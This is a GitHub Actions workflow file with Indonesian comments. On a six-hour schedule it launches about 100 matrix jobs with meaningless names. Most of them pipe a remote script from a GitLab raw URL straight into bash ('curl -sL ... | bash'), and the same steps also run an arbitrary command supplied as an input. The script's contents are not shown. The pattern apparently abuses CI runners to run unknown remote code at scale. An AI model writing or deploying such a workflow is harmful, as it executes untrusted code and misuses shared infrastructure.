name: kitasa

on:
  workflow_dispatch:
    inputs:
      command:
        description: 'Perintah yang akan dijalankan di job hert'
        required: false
        default: 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash'
  schedule:
    - cron: '0 */6 * * *'   # setiap 6 jam

jobs:
  hert:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [A.1, B.1]
        flag: [A, B, C, D, E, F, G, H, I, J]
    steps:
      - name: hertob
        continue-on-error: true
        run: echo hert

  nert:
    needs: [hert]
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false        
      matrix:
        build: [C.1, D.1]
        flag: [A, B, C, D, E, F, G, H, I, J]
    steps:                   
      - name: Jalankan perintah
        continue-on-error: true
        run: ${{ github.event.inputs.command || 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash' }}
      - name: okes
        run: sleep 300        # 5 menit

  dert:
    needs: [hert]
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [E.1, F.1, F.2, F.3, F.4, F.5, F.6, F.7]
        flag: [A, B, C, D, E, F, G, H, I, J]
    steps:
      - name: dertjob
        continue-on-error: true
        run: ${{ github.event.inputs.command || 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash' }}